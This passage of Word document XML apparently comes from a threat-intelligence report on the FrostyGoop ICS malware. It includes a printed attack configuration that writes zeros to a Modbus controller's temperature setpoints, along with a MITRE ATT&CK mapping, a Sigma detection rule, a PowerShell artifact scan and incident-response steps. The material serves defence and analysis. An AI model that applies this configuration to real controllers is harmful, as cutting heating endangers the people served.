        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rf9jaaa5fap6" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Configuration File</w:t>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"targets":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"ip": "10.1.1.50",</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"port": 502,</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"device": "ENCO_CONTROLLER_01",</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"start_addr": 40001,</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"count": 10,</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"new_values": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],</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"description": "Set all temperature setpoints to 0"</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"execution_time": "2024-01-22T03:47:00Z"</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_95efr0bgag0g" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m2v0tw7hkwit" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive TTP Matrix</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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sub-Technique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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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T1133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Exploit exposed router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Firewall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hyperlink w:anchor="ref65">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[65]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T1505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Web shell on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File system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hyperlink w:anchor="ref66">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[66]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T0846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Modbus device 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Network traffic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hyperlink w:anchor="ref67">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[67]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T0802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Read control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ICS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hyperlink w:anchor="ref68">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[68]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Command &amp;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T1571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Non-standard port (502)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Port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hyperlink w:anchor="ref69">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[69]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T0831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Manipulation of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Process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hyperlink w:anchor="ref70">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[70]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uhj5mqkvjqg6" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ICS-Specific Techniques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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ICS 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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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Impair Process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T0855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Temperature setpoints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Loss of heating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hyperlink w:anchor="ref71">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[71]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Inhibit Response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T0816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Alarm suppression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Delayed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hyperlink w:anchor="ref72">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[72]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u2or596hks19" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection &amp; Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000216">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_494ojofb5to8" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000217">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_duijnaevg844" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network-Based Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000218">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Sigma Rule: FrostyGoop Modbus Manipulation</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Reference: [[73]](#ref73)</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title: Suspicious Modbus Multiple Register Writes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id: 8a7f3c4e-9b5d-4e2a-b3f7-d1c8e5a9f2b1</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status: experimental</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description: Detects unusual Modbus write operations characteristic of FrostyGoop</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logsource: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product: zeek</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service: modbus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detection:</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selection:</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function_code: 16  # Write Multiple Registers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quantity: '&gt;10'</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timeframe: 5m</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condition: selection | count() by src_ip &gt; 20</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level: high</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000237">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hxx4spyzxm2z" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host-Based Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000238">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># PowerShell detection for FrostyGoop artifacts</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Deploy to OT Windows systems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$suspiciousFiles =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"C:\Windows\Temp\modbus*.exe",</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"C:\ProgramData\*config.json",</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"C:\Users\*\AppData\Local\Temp\fg*.tmp"</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foreach ($pattern in $suspiciousFiles)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$files = Get-ChildItem -Path $pattern -ErrorAction SilentlyContinue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if ($files)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foreach ($file in $files)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$hash = (Get-FileHash $file.FullName -Algorithm SHA256).Hash</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Write-EventLog -LogName Security -EventId 4001 -Message "Suspicious file detected: $($file.FullName) SHA256: $hash"</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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p96pi4i74gs5" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000258">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_clzgj93einy2" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Actions (0-4 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000259">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate Modbus networks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from internet-connected systems </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref74">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[74]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement emergency manual control</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> procedures </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref75">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[75]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy OT-specific incident response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> team </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref76">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[76]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document all register values</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before making changes </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref77">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[77]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5g0ffpxg5pxh" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-term Actions (4-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit all internet-exposed ICS devices</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref78">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[78]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change default credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on all network devices </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref79">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[79]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000260">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement Modbus authentication</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where supported </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref80">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[80]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000261">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_68iiga2gr8wk" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-term Actions (1-30 days)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy unidirectional security gateways</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref81">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[81]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000263">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement ICS-specific monitoring</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref82">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[82]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000264">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Develop manual operation playbooks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref83">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[83]</w:t>
        </w:r>
      </w:hyperlink>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ojxeiktsw9rf" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000268">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jqhglsbo2qoh" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrated Response Capability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000269">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The combination of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
